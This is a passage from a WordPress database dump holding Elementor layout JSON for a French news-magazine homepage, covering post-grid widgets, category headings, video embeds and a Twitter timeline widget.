":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2424,775,'_elementor_version','0.4'),(2425,775,'_elementor_css','a:3:{s:4:\"time\";i:1509430524;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2426,776,'_elementor_edit_mode','builder'),(2427,776,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_